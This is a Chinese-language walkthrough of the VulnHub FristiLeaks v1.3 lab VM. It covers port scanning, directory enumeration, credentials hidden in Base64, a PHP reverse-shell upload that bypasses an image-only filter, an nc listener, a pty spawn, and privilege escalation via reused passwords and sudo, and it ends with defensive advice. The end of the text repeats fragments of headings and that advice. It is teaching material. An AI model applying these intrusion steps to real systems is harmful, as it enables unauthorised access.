VulnHub FristiLeaks v1.3 渗透测试教学文档<\/h1>

1. 环境准备<\/h2>

1.1 下载目标虚拟机<\/h3>

下载链接1 (Torrent): https:\/\/download.vulnhub.com\/fristileaks\/FristiLeaks_1.3.ova.torrent<\/code><\/li>

下载链接2 (直接下载): https:\/\/download.vulnhub.com\/fristileaks\/FristiLeaks_1.3.ova<\/code><\/li>
<\/ul>
1.2 运行环境<\/h3>

VirtualBox 或 VMware Workstation Player<\/li>
<\/ul>
1.3 通关提示<\/h3>

虚拟机默认用户名为 fristi<\/code><\/li>
<\/ul>
2. 信息收集<\/h2>
2.1 主机发现<\/h3>
使用网络扫描工具发现目标IP地址：<\/p>
nmap -sn 10.10.10.0\/24
<\/code><\/pre>
发现目标主机位于 10.10.10.132<\/code><\/p>
2.2 服务扫描<\/h3>
全面扫描目标主机开放端口：<\/p>
nmap -sS -Pn -T4 -p- 10.10.10.132
<\/code><\/pre>
发现仅开放80端口(HTTP服务)<\/p>
详细扫描80端口：<\/p>
nmap -A -O -p80 10.10.10.132
<\/code><\/pre>
获取到以下信息：<\/p>

Apache httpd 2.2.15 (CentOS)<\/li>
DAV\/2 PHP\/5.3.3<\/li>
robots.txt中有3个禁止访问的条目<\/li>
<\/ul>
3. Web应用渗透<\/h2>
3.1 检查robots.txt<\/h3>
访问 http:\/\/10.10.10.132\/robots.txt<\/code> 发现3个禁止目录，但访问这些目录都显示相同页面，无利用价值。<\/p>
3.2 目录枚举<\/h3>
使用dirb进行目录扫描：<\/p>
dirb http:\/\/10.10.10.132\/
<\/code><\/pre>
发现一些图片，其中keep-calm<\/code>图片提示"KEEP CALM AND DRINK FRISTI"，暗示可能存在\/fristi\/<\/code>目录。<\/p>
扫描\/fristi\/<\/code>目录：<\/p>
dirb http:\/\/10.10.10.132\/fristi\/
<\/code><\/pre>
发现index页面，查看页面源代码发现：<\/p>

用户名提示：eezeepz<\/code><\/li>
一大段Base64编码内容<\/li>
<\/ol>
3.3 解码Base64内容<\/h3>
将Base64内容保存为单行文本：<\/p>
base64 -d \/tmp\/encoded.txt > decoded.png
<\/code><\/pre>
解码后得到PNG图片，使用图片查看工具查看，发现密码：<\/p>
username: eezeepz
password: keKkeKKeKKeKkEkkEk
<\/code><\/pre>
4. 获取初始访问权限<\/h2>
4.1 上传Web Shell<\/h3>

下载php-reverse-shell: http:\/\/pentestmonkey.net\/tools\/web-shells\/php-reverse-shell<\/code><\/li>
修改reverse-shell.php中的IP和端口<\/li>
由于只允许上传图片格式，修改后缀为.jpg<\/li>
上传成功后访问shell文件<\/li>
<\/ol>
4.2 建立反向连接<\/h3>
在攻击机上设置监听：<\/p>
nc -nlvp 8888
<\/code><\/pre>
成功获取低权限shell。<\/p>
5. 权限提升<\/h2>
5.1 初步信息收集<\/h3>
查看\/home<\/code>目录发现用户eezeepz<\/code>，检查其目录下的notes.txt<\/code>文件，获得提示：<\/p>

在\/tmp<\/code>下创建runtis<\/code>文件并赋予权限<\/li>
<\/ul>
5.2 访问admin目录<\/h3>
执行提示操作后可以访问\/home\/admin<\/code>目录，发现以下文件：<\/p>

cryptpass.py<\/code> - 加密脚本<\/li>
cryptpass.txt<\/code> - 加密后的密码<\/li>
whoisyourgodnow.txt<\/code> - 加密后的字符串<\/li>
<\/ol>
解密得到两组凭据：<\/p>

mVGZ3O3omkJLmy2pcuTq : thisisalsopw123<\/code><\/li>
=RFn0AKnlMHMPIzpyuTI0ITG : LetThereBeFristi!<\/code><\/li>
<\/ol>
5.3 切换用户<\/h3>
尝试切换到fristigod<\/code>用户：<\/p>
su fristigod
<\/code><\/pre>
输入密码LetThereBeFristi!<\/code>成功<\/p>
注意<\/strong>：如果遇到su问题，可能是由于tty限制，使用以下命令解决：<\/p>
python -c 'import pty;pty.spawn("\/bin\/sh")'
<\/code><\/pre>
5.4 获取root权限<\/h3>
检查fristigod<\/code>用户的sudo权限：<\/p>
sudo -l
<\/code><\/pre>
输入密码LetThereBeFristi!<\/code>后，发现可以以root权限执行命令，最终获取root权限。<\/p>
6. 关键知识点总结<\/h2>

信息收集<\/strong>：Nmap扫描、目录枚举、robots.txt检查<\/li>
隐写术<\/strong>：Base64编码隐藏在HTML源码中<\/li>
Web Shell上传<\/strong>：绕过文件类型限制的技巧<\/li>
权限提升路径<\/strong>：

低权限shell → 发现提示 → 访问受限目录 → 解密凭据 → 切换用户 → sudo提权<\/li>
<\/ul>
<\/li>
密码复用<\/strong>：多个地方使用相同密码<\/li>
TTY问题解决<\/strong>：使用Python生成伪终端<\/li>
<\/ol>
7. 防御建议<\/h2>

避免在源码中隐藏敏感信息<\/li>
实施严格的文件上传验证<\/li>
不同账户使用不同密码<\/li>
限制sudo权限<\/li>
定期检查系统上的异常文件<\/li>
最小化公开目录和信息<\/li>
<\/ol>

VulnHub FristiLeaks v1.3 渗透测试教学文档<\/h1>

1. 环境准备<\/h2>

2. 信息收集<\/h2>

3. Web应用渗透<\/h2>

3.1 检查robots.txt<\/h3> 访问 http:\/\/10.10.10.132\/robots.txt<\/code> 发现3个禁止目录，但访问这些目录都显示相同页面，无利用价值。<\/p>

4. 获取初始访问权限<\/h2>

5. 权限提升<\/h2>

7. 防御建议<\/h2> 避免在源码中隐藏敏感信息<\/li> 实施严格的文件上传验证<\/li> 不同账户使用不同密码<\/li> 限制sudo权限<\/li> 定期检查系统上的异常文件<\/li> 最小化公开目录和信息<\/li> <\/ol>

3.1 检查robots.txt<\/h3>
访问 `http:\/\/10.10.10.132\/robots.txt<\/code> 发现3个禁止目录，但访问这些目录都显示相同页面，无利用价值。<\/p>`

7. 防御建议<\/h2>

避免在源码中隐藏敏感信息<\/li>
实施严格的文件上传验证<\/li>
不同账户使用不同密码<\/li>
限制sudo权限<\/li>
定期检查系统上的异常文件<\/li>
最小化公开目录和信息<\/li> <\/ol>